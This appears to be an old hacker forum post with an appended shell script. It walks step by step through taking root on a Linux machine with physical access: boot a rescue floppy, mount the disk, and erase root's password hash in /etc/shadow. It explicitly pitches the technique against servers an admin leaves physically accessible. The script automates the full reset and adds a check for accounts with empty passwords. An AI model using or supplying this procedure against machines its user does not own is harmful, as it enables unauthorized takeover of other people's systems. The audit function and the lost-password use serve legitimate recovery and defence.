Rooting Linux with a floppy
You have lost the root password on your Linux box and are now considering reformatting
everything to regain control? Your admin is a moron who leaves the server physically
accessible to everybody? You want to test your own Linux box? Don't worry: as long as you have
a floppy rescue disk at hand, you can root it ;-)
The problem with the newer Linux releases (since 6.2) is:
a) the shadow suite is installed by default, so the password hashes are moved out of the
world-readable /etc/passwd into /etc/shadow, which only root can read;
b) passwords are hashed with MD5-based crypt (34 characters starting with $1$, versus 13
characters for traditional DES crypt), which is far slower to brute-force. So the old trick
of simply grabbing /etc/passwd and running JtR (John the Ripper) against it doesn't work
anymore: the hashes aren't in that file, and even with /etc/shadow in hand the MD5 hashes
take much longer to crack.
What to do now? Follow the guide :
1- Boot from the rescue floppy
2- Press the key your boot loader uses for the rescue option (e.g. F4)
3- At the boot prompt type "linux rescue" (to enter rescue mode)
4- $ mknod /dev/hda b 3 0 (create the block device node for the first IDE disk; the rescue
ramdisk often has no device nodes, and mknod needs the type and the major/minor numbers,
which are 3/0 for hda)
* * * N o t e * * *
If you have more than one partition on your HD, check which one holds the Linux root filesystem:
A- $ fdisk /dev/hda
B- (fdisk) : p (print the partition table) : m (list the commands) : q (quit without writing)
5- $ mknod /dev/hda2 b 3 2 (create the device node for partition 2, the Linux partition if you
have a DOS partition as the primary partition, for example; the minor number is the
partition number)
6- $ mkdir /data (create a mount point on the rescue system's RAM disk)
7- $ mount -t ext2 /dev/hda2 /data (mount the hard disk's root filesystem under that mount
point; if the root filesystem is not ext2, give its real type instead)
8- $ cd /data/etc
9- $ chmod u+w /data/etc/shadow (give the owner write access; /etc/shadow is normally mode
0400 or 0600. Root in the rescue shell can write it regardless, but vi will otherwise
complain that the file is read-only. chmod 700 works too but needlessly makes the file
executable; note the original mode and restore it afterwards.)
10- $ /data/bin/vi /data/etc/shadow (edit the shadow file with the target system's vi)
11- Find the root line; it looks like root:$1$...:11000:0:99999:7::: and the second field
(between the first and second colons) is the password hash. In command mode, position the
cursor on each character of the hash and press x to delete it, until the line starts with
root:: (an empty second field means no password is required). Don't delete the colons, and
there is no need for insert mode (i) for this.
12- Press the Escape key, then ":"
13- Save and quit with :wq! (the ! forces the write even if vi considers the file read-only)
At this point your edit may still be sitting in the rescue system's buffer cache in RAM rather
than on the HD, so DON'T REBOOT YET!! Unmount cleanly first so the change is flushed to disk.
14- $ cd / (leave the mounted tree, otherwise it is busy and cannot be unmounted)
15- $ umount /data (flushes the edit to disk)
16- $ init 0 (halts the system; use init 6 or reboot if you want it to reboot straight away),
then boot normally from the hard disk.
Now you can log in as root; there is no password protecting root anymore. Set a new one
right away with passwd.
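The whole procedure as a script, added here as an example that is not part of the original post. It assumes, as the post does, that the Linux root filesystem is ext2 on /dev/hda2 and that the rescue shell provides sh, awk, grep, mknod, mount and umount; the device name, mount point and account name are hypothetical parameters you override for your box. Instead of editing with vi it blanks the hash field with awk, and it adds the check an admin wants afterwards: a function that lists every account whose password field is empty, which is exactly the state this technique leaves root in.

```shell
#!/bin/sh
# Added example, not from the original post: the floppy-rescue root reset as a
# script, plus an audit for the state it leaves behind.
# Assumptions (hypothetical, not stated by the post): root fs is ext2 on
# /dev/hda2; the rescue shell provides sh, awk, grep, mknod, mount, umount.

ROOT_DEV=${ROOT_DEV:-/dev/hda2}   # assumed Linux root partition
MNT=${MNT:-/data}                 # mount point on the rescue ramdisk

# Steps 4/5: the rescue ramdisk may lack device nodes. IDE primary master is
# block major 3, minor 0 for the whole disk and minor N for partition N.
make_ide_nodes() {
    [ -e /dev/hda ]  || mknod /dev/hda  b 3 0
    [ -e /dev/hda2 ] || mknod /dev/hda2 b 3 2
}

# Steps 6/7: mount the target root filesystem read-write.
mount_target() {
    mkdir -p "$MNT"
    mount -t ext2 "$ROOT_DEV" "$MNT"
}

# Steps 9-13 without vi: empty the hash field (field 2) of one account.
# Shadow layout: name:hash:lastchg:min:max:warn:inactive:expire:reserved
# Writes back through the existing inode so owner and mode are preserved.
# Returns 1 if the account is not present in the file.
blank_password() {
    shadow=$1
    user=$2
    grep -q "^$user:" "$shadow" || return 1
    tmp="$shadow.tmp.$$"
    awk -F: -v u="$user" 'BEGIN { OFS=":" } $1 == u { $2 = "" } { print }' \
        "$shadow" > "$tmp" && cat "$tmp" > "$shadow" && rm -f "$tmp"
}

# The check to run afterwards: list accounts that need no password at all
# (empty field 2). Locked accounts ("*" or "!") are not reported.
passwordless_accounts() {
    awk -F: '$2 == "" { print $1 }' "$1"
}

# Steps 14-16: leave the tree, flush, unmount, then halt (init 6 would reboot).
finish() {
    cd /
    sync
    umount "$MNT"
    init 0
}

# Only touch real devices when explicitly asked: sh reset-root.sh --run
if [ "${1:-}" = "--run" ]; then
    make_ide_nodes
    mount_target
    blank_password "$MNT/etc/shadow" root || { echo "no root entry"; exit 1; }
    echo "accounts with an empty password field:"
    passwordless_accounts "$MNT/etc/shadow"
    finish
fi
```

The awk rewrite keeps every other field intact, so the password-ageing columns are untouched and only the hash disappears; running passwordless_accounts on the mounted shadow file before and after the edit shows you exactly which accounts are open, which is also the one-liner to run on any box you suspect was "rooted" this way.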
Take care everyone, Just1ce.
Reference: http://www.exploitx.com/69/rooting-linux-with-a-floppy/